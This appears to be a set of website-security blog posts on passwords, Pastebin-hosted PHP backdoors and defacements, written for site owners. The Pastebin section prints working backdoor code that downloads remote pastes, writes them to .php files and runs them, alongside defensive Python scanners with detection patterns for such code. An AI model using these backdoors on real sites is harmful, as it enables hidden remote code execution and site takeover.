It is a very true and very sad sentiment that I have to agree with. It becomes evident when I speak with website owners and they say, “I have had a website for 10 years, never been hacked, I don’t need to worry about it.” Those always make for the most interesting and painful conversations when the hack does occur. Some go as far as to accuse us: “I was fine, then I heard you speak, or read your post.” A bit over the top, I agree, but it gives you a small window into the state of mind once the hack does happen.

I like to think of website security in the form of posture. It is through good posture that you position yourself for success. I take this from my Brazilian Jiu-jitsu training, where it’s through posture that you can help prevent positions that would see you in a lot of pain.

Remember, security is not about risk elimination, but rather risk reduction. You have heard this time and time again: risk will never be zero. You can, however, employ tools and steps to reduce it where you can, so as not to become part of the statistic.

The Dynamics of Passwords


How often do you think about the passwords you’re using? Not only for your website, but also for everything else you do on the internet on a daily basis? Are you re-using any of the same passwords to make it easier to remember them?

We see it all too often: weak passwords used to secure website login for FTP, database, cPanel, and the CMS dashboard. Everyone has their own password policy. It’s very personal and usually based on a set of assumptions about online security. Many users choose policies of efficiency over security. Even the paranoid among us have to confront the truth. Like any defensive measure, best practices in password management can only minimize the level of risk.

Password management is a choice, and a habit. By taking a good look at the risks, users can make informed decisions and put better passwords into practice.

History of the Strong Password

Most password strength meters are too soft. The companies that use them know this, but they don’t want users to leave the registration process due to a restrictive password policy. Modern software can guess many so-called “strong” passwords in minutes, and the most common passwords in milliseconds. As password hacking grew in complexity over time, so did the requirements on passwords.



Creative Evasion Technique Against Website Firewalls

During one of our recent in-house Capture The Flag (CTF) events, I was playing with the idea of what could be done with Non-Breaking Spaces. I really wanted to win and surely there had to be a way through the existing evasion controls.

This post is going to be a bit code-heavy for most end-users, but if you choose to read you’re bound to find it very insightful.



Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files.

Here’s the backdoor code:

// Triggers only when the first GET parameter is named "up"
if(array_keys($_GET)[0] == 'up'){
    // Fetch the payload from Pastebin's raw endpoint (URL defanged here)
    $content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
    if($content){
        // Replace evex.php on the compromised site with the downloaded code
        unlink('evex.php');
        $fh2 = fopen("evex.php", 'a');
        fwrite($fh2,$content);
        fclose($fh2);
    }
}else{
    // Any other request just prints a harmless-looking string
    print "test";
}

It’s more or less a typical backdoor. It downloads malicious code from a remote server and saves it in a file on a compromised site, making it available for execution. What makes this backdoor interesting is the choice of the remote server. It’s not being hosted on a hackers’ own site, not even a compromised site — now it’s Pastebin.com — the most popular web application for sharing code snippets.

Technically, the criminals used Pastebin for what it was built for – to share code snippets. The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website. Pastebin.com allows users to download the code in “raw” format (i.e. no HTML, no site UI, just the code — note the raw.php part of the URL). This means the hacker can save the PHP backdoor shell on Pastebin and link to it from your website.

Here’s an example of a slightly more elaborate backdoor, uploaded via the RevSlider hole:

[Screenshot: code-downloading backdoor from Pastebin]

In the screenshot, you can see that this code injects the content of the Base64-encoded $temp variable at the top of the WordPress core wp-links-opml.php file. You can see the decoded $temp content below:

[Screenshot: decoded backdoor that uses Pastebin]

Again, you can see that some code is being downloaded from Pastebin.com, saved to a file and immediately executed. This time, this only happens when the attacker provides the Pastebin snippet ID in the wp_nonce_once request parameter (which is also used as the file name when they save the downloaded code). The use of the wp_nonce_once parameter hides the URL of malicious pastes (which makes it difficult to block) and at the same time adds flexibility to the backdoor — now it can download and execute any Pastebin.com snippet — even those that don’t exist at the time of injection — you just need to pass their IDs in the request to wp-links-opml.php.

FathurFreakz encoder

I should also mention that Indonesian hackers have an encoder that was made specifically to work with Pastebin.com. It is called PHP Encryptor by Yogyakarta Black Hat or by FathurFreakz. Basically, they create a paste of their PHP code on Pastebin.com and then specify the URL of the code in the encryptor, which then generates obfuscated code that looks like this:

[Screenshot: code encoded specifically for Pastebin]

If you decode it, you’ll see this:

function FathurFreakz($ct3){
    xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

This code downloads and executes a Pastebin.com paste (via the xcurl function) whose ID is encrypted in the CODE constant. Here, you can see that they use one more special Pastebin.com URL type, download.php, which acts similarly to raw.php but also sends HTTP headers that make browsers download the content as a file instead of displaying it.
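As an added example, not code from the original post, here is a Python scanner a site owner could run over a web root to surface the traits the variants above share: a pastebin.com raw.php or download.php URL, a fetch from a hard-coded remote URL that is then written to a .php file or passed to eval(), and the wp_nonce_once trigger parameter. The sample PHP sources and the paste ID placeholder are constructed.

```python
import os
import re

# Indicator patterns drawn from the backdoor variants above; the host pattern
# tolerates whitespace because attackers and defanged write-ups split "pastebin.com".
CHECKS = {
    "pastebin": re.compile(r"pastebin\s*\.\s*com\s*/\s*(raw|download)\.php", re.I),
    "remote_fetch": re.compile(r"\b(file_get_contents|fopen|curl_init)\s*\(\s*['\"]https?://", re.I),
    "php_write": re.compile(r"\b(fopen|file_put_contents)\s*\([^;]*\.php['\"]", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "wp_nonce_once": re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*['\"]wp_nonce_once['\"]\s*\]"),
}

def scan_php_source(source: str) -> list:
    """Return the indicator names present in one PHP source string."""
    return [name for name, rx in CHECKS.items() if rx.search(source)]

def is_suspicious(hits: list) -> bool:
    """A Pastebin raw/download URL alone is damning; otherwise require fetch plus write/exec."""
    return "pastebin" in hits or (
        "remote_fetch" in hits and ("php_write" in hits or "eval" in hits))

def scan_sources(files: dict) -> dict:
    """Map path -> indicator list for every suspicious {path: source} entry."""
    report = {}
    for path, source in files.items():
        hits = scan_php_source(source)
        if is_suspicious(hits):
            report[path] = hits
    return report

def scan_tree(root: str) -> dict:
    """Read every .php file under root and run scan_sources over it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(".php"):
                p = os.path.join(dirpath, n)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    files[p] = fh.read()
    return scan_sources(files)

# Constructed samples (not real site files) modelled on the variants above.
SAMPLES = {
    "wp-content/uploads/dropper.php":
        '<?php if(array_keys($_GET)[0]=="up"){$c=file_get_contents("http://pastebin . com/raw.php?i=PASTE_ID_PLACEHOLDER");'
        'if($c){unlink("evex.php");$f=fopen("evex.php","a");fwrite($f,$c);fclose($f);}}else{print "test";}',
    "wp-links-opml.php":
        '<?php $id=$_REQUEST["wp_nonce_once"];$c=file_get_contents("http://pastebin.com/raw.php?i=".$id);'
        'file_put_contents($id.".php",$c);include($id.".php");',
    "wp-includes/feed-cache.php":
        '<?php $x=file_get_contents(__DIR__."/cache.json"); echo strlen($x);',
}
```

Run scan_tree('/path/to/webroot') against a live site; the patterns are heuristics, so treat every hit as a lead for manual review rather than a verdict.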

By the way, that hacker group likes using Pastebin.com so much that some of their backdoors look like this (decoded):

[Screenshot: Pastebin backdoor, decoded]

Hackers and Pastebin

Pastebin has a long history of being used by hackers of all ranks. Many hacker groups share data stolen from famous companies via the service. Pastes are used as anonymous intermediary storage for data stolen from user computers. Some pastes are known to be used in malware attacks – they may contain encrypted addresses and even base64-encoded malicious binary code. Here are just a few notable headlines from the last 5 years:

This time we see relatively massive use of Pastebin in live attacks, which is quite new to us. This also suggests that we, security researchers, should be more careful when sharing malicious code we find in public pastes – it is easy for hackers to reuse them directly from Pastebin.com. It would be a good idea, before sharing, to make some obvious modification to the code that would prevent its execution when downloaded in a raw format.

2014 Website Defacements

When a website has been defaced, it is often the most visual and obvious hack that a website can suffer from. They also come parceled with their own exquisite sense of dread. Nothing gives that gut-wrenching feeling of “I’ve been hacked” more than seeing this on your home page:

[Screenshot: defaced website home page]

Most malware that we see on a daily basis is driven by some desire to profit off of victims – classic pharma spam or theft of credit card details and personal information.

By contrast, most defacements have little to no financial incentive. They are almost always done to further some political, religious or ideological goal. It may appear as though the websites are defaced by Anonymous or groups like the Syrian Electronic Army. The FBI even warned about ISIS hackers defacing WordPress websites. Some attackers will try to deface as many sites as possible with their ‘calling card’ just to prove how “l33t” (elite) they are, or to give attention to whatever cause they are trumpeting.

These hacks remind me of bygone days when computer hacking was done primarily for mischief and trouble-making and was less associated with the nefarious criminal underworld. We also see school websites defaced on a regular basis by students. Don’t underestimate the number of bored kids who are learning how to hack.

A lot of the time all that is tampered with is the site’s index.php file which can easily be restored by downloading a fresh copy of whatever CMS you use. A more nasty defacement, though, will overwrite something like your WordPress wp-config.php file entirely… and if you don’t have a backup, well, make one right now for a rainy day. :)

Now, having said all this: while website defacements are primarily about shock value, much of the time they are coupled with malware, too. If this ever happens to your site, assume it is fully compromised and act accordingly. Whoever defaces a site will almost certainly place a few backdoors for easy access later on. The more harmful hacks will also attempt to infect the computers of end users visiting the site.

For this reason, if you ever suffer from this sort of calamity make sure you perform a thorough check for any malicious files! Otherwise you’ll likely end up with the same problem soon after.
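One way to do that check, as an added example rather than anything from the original post: hash every file of the live site and compare it with a known-good baseline (your last clean backup, or a fresh copy of the CMS for core files), reporting modified, missing and newly added files and calling out the ones this post singles out. The CLEAN and DEFACED trees below are constructed samples, and the high-value watch list is an assumption to extend for your own CMS.

```python
import hashlib
import os

# Files the post singles out: index.php is the usual defacement target and
# wp-config.php the nastier one. Constructed watch list; extend for your CMS.
HIGH_VALUE = {"index.php", "wp-config.php", ".htaccess"}

def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def hash_tree(root: str) -> dict:
    """Map relative path -> SHA-256 for every file under root."""
    digests = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            with open(p, "rb") as fh:
                rel = os.path.relpath(p, root).replace(os.sep, "/")
                digests[rel] = sha256_bytes(fh.read())
    return digests

def hash_sources(files: dict) -> dict:
    """Same shape as hash_tree, for in-memory {path: bytes} samples."""
    return {p: sha256_bytes(b) for p, b in files.items()}

def diff_trees(baseline: dict, live: dict) -> dict:
    """Compare digest maps. 'added' is where dropped backdoors usually hide."""
    modified = sorted(p for p in baseline if p in live and live[p] != baseline[p])
    missing = sorted(p for p in baseline if p not in live)
    added = sorted(p for p in live if p not in baseline)
    hit = sorted(p for p in modified + missing if os.path.basename(p) in HIGH_VALUE)
    return {"modified": modified, "missing": missing, "added": added,
            "high_value_hit": hit}

# Constructed samples: a known-good copy and the same site after a defacement.
CLEAN = {
    "index.php": b"<?php require __DIR__ . '/wp-blog-header.php';",
    "wp-config.php": b"<?php define('DB_NAME', 'example');",
    "wp-links-opml.php": b"<?php // exports the links list as OPML",
}
DEFACED = dict(CLEAN)
DEFACED["index.php"] = b"<html><body>defaced (constructed sample)</body></html>"
DEFACED["wp-content/uploads/.cache.php"] = b"<?php // placeholder for a dropped file"
```

On a real site call diff_trees(hash_tree('/path/to/backup'), hash_tree('/path/to/webroot')); anything under "added" deserves a look even when nothing else changed, since a dropped backdoor is a new file rather than a modified one.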

There are a whole bunch of ways that this can happen – websites that employ poor password management and/or use out-of-date software are easy, low-hanging fruit for these vandals. Naturally, our clients using our CloudProxy firewall are protected against such attacks.